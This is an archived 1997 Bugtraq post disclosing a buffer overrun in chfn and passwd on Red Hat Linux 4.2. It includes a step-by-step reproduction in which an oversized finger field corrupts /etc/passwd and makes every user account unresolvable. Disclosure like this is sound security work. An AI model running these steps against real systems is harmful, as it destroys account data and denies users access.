Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1997_4

Bugtraq archives for 4th quarter (Oct-Dec) 1997: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

Alex Mottram (alexNET-CONNECT.NET)
Fri, 19 Dec 1997 07:37:49 -0600

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Tim Newsham: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
Previous message: Aleph One: "Administratrivia"
Next in thread: Alec Muffett: "Re: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux"

I don't have the time to look into this much further, but it definitely
looks scarey.  I've tried it on 3 machines, and they all produce the
same results.  For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alexmachine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alexmachine alex]$ cat /etc/pam.conf
#
#  THIS FILE IS NOW OBSOLETE
#
#  The contents of this file should be replaced by files in the
#  /etc/pam.d/ directory.
#
#

[alexmachine alex]$ ls /etc/pam.d/
chfn    ftp     login   passwd  rlogin  samba   xdm
chsh    imap    other   rexec   rsh     su

[alexmachine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so shadow nullok
use_authtok
session    required     /lib/security/pam_pwdb.so

[alexmachine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so use_authtok nullok

[alexmachine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alexmachine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alexmachine /tmp]$ ./pass
[alexmachine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alexmachine /tmp]$ wc /etc/passwd
     26      29    2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alexmachine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zanemachine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zanemachine zane]$ wc /etc/passwd
     31      34   47829 /etc/passwd

[zanemachine zane]$ su someuser
su: user someuser does not exist
[zanemachine zane]$ su alex
su: user alex does not exist
[zanemachine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed.  (ftp, pop-3, etc...)

Next message: Tim Newsham: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
Previous message: Aleph One: "Administratrivia"
Next in thread: Alec Muffett: "Re: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux"